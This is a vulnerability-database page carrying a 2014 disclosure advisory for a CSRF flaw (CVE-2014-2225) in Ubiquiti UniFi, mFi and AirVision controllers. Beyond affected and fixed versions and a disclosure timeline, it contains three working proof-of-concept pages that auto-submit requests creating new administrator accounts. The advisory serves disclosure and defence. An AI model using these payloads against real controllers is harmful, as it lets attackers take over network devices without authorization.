Vulners
Lucene search
UniFi / mFi / AirVision Cross Site Request Forgery
| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
 | Ubiquiti UbiFi / mFi / AirVision - CSRF Vulnerability | 1 Aug 201400:00 | – | zdt |
 | CVE-2014-2225 | 8 Feb 202015:56 | – | cve |
 | CVE-2014-2225 | 8 Feb 202015:56 | – | cvelist |
 | Ubiquiti UbiFi / mFi / AirVision - Cross-Site Request Forgery | 28 Jul 201400:00 | – | exploitdb |
 | EUVD-2014-2265 | 7 Oct 202500:30 | – | euvd |
 | Ubiquiti UbiFi mFi AirVision - Cross-Site Request Forgery | 28 Jul 201400:00 | – | exploitpack |
 | CVE-2014-2225 | 8 Feb 202016:15 | – | nvd |
 | Cross site request forgery (csrf) | 8 Feb 202016:15 | – | prion |
 | Ubiquiti UbiFi / mFi / AirVision - CSRF Vulnerability | 29 Jul 201400:00 | – | seebug |
`-----------
Vendor:
-----------
Ubiquiti Networks (http://www.ubnt.com/)
-----------------------------------------
Affected Products/Versions:
-----------------------------------------
UniFi Controller v2.4.6
mFi Controller v2.0.15
AirVision Controller v2.1.3
Note: Previous versions may be affected
-----------------
Description:
-----------------
Title: Cross-site Request Forgery (CSRF)
CVE: CVE-2014-2225
CWE: http://cwe.mitre.org/data/definitions/352.html
Detailed writeup: http://sethsec.blogspot.com/2014/07/cve-2014-2225.html
Researcher: Seth Art - @sethsec
---------------
UniFi POC:
---------------
<html>
<head>
<script>
function sendCSRF()
{
var url_base = "https://192.168.0.106:8443/api/add/admin"
var post_data="%7B%22name%22%3A%22csrf%22%2C%22lang%22%3A%22en_US%22%2C%22x_password%22%3A%22csrf%22%7D"
var xmlhttp;
xmlhttp = new XMLHttpRequest();
xmlhttp.open("POST", url_base, true);
xmlhttp.setRequestHeader("Accept","*/*");
xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded;
charset=UTF-8");
xmlhttp.withCredentials= "true";
xmlhttp.send(post_data);
}
</script>
</head>
<body>
<h1>CSRF POC</h1>
Sending CSRF Payload!!!
<body onload="sendCSRF()">
</body>
-------------
mFi POC:
-------------
<html>
<head>
<script>
function sendCSRF()
{
var url_base = "https://192.168.0.106:6443/api/v1.0/add/admin"
var post_data="%7B%22name%22%3A%22csrf%22%2C%22lang%22%3A%22en_US%22%2C%22x_password%22%3A%22csrf%22%7D"
var xmlhttp;
xmlhttp = new XMLHttpRequest();
xmlhttp.open("POST", url_base, true);
xmlhttp.setRequestHeader("Accept","*/*");
xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded;
charset=UTF-8");
xmlhttp.withCredentials= "true";
xmlhttp.send(post_data);
}
</script>
</head>
<body>
<h1>CSRF POC</h1>
Sending CSRF Payload!!!
<body onload="sendCSRF()">
</body>
--------------------
AirVision POC:
--------------------
<html>
<head>
<script>
function sendCSRF()
{
var url_base = "https://192.168.0.106:7443/api/v2.0/admin"
var post_data="{\”name\”:\”csrf\”,\”email\”:\”[email protected]\”,\”userGroup:\”:\”admin\”,\”x_password\”:\”password\”,\”confirmPassword\”:\”password\”,\”disabled\”:\”false\”}”
var xmlhttp;
xmlhttp = new XMLHttpRequest();
xmlhttp.open("POST", url_base, true);
xmlhttp.setRequestHeader("Accept","*/*");
xmlhttp.setRequestHeader("Content-type","application/plain; charset=UTF-8");
xmlhttp.withCredentials= "true";
xmlhttp.send(post_data);
}
</script>
</head>
<body>
<h1>CSRF POC</h1>
Sending CSRF Payload!!!
<body onload="sendCSRF()">
</body>
-------------
Solution:
-------------
UniFi Controller - Upgrade to UniFi Controller v3.2.1 or greater
mFi Controller - Upgrade to mFi Controller v2.0.24 or greater
AirVision Controller - Upgrade to UniFi Video v3.0.1 or greater (Note:
The application name changed from AirVision to UniFi Video)
-----------------------------
Disclosure Timeline:
-----------------------------
2014-02-16: Notified Ubiquiti of vulnerabilities in UniFi and mFi products
2014-02-17: Ubiquiti acknowledges and requests details
2014-02-17: Report with POC sent to Ubiquiti
2014-02-19: Asked Ubiquiti to confirm receipt of report
2014-02-19: Ubiquti confirms receipt of report and existence of the
vulnerabilities
2014-02-25: Notified Ubiquiti of CSRF vulnerability in AirVision product
2014-02-19: Ubiquti confirms receipt of AirVision report and existence
of the vulnerability
2014-02-28: CVE-2014-2225 assigned
2014-03-12: Requested status update
2014-03-27: Requested status update
2014-04-07: Requested status update, mention that we might need to
bring in a CERT
2014-04-09: Ubiquiti provides timeline for solution
2014-04-18: UniFi Video 3.0.1 is released
2014-05-30: Requested a status update on the remaining two products
2014-06-12: Requested a status update on the remaining two products
2014-06-12: mFi v2.0.24 and UniFi 3.2.1 are released
2014-06-13: Set public disclosure date of 2014-07-24 and notified vendor
2014-07-24: Public disclosure
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
24 Jul 2014 00:00Current
0.3Low risk
Vulners AI Score0.3
EPSS0.00181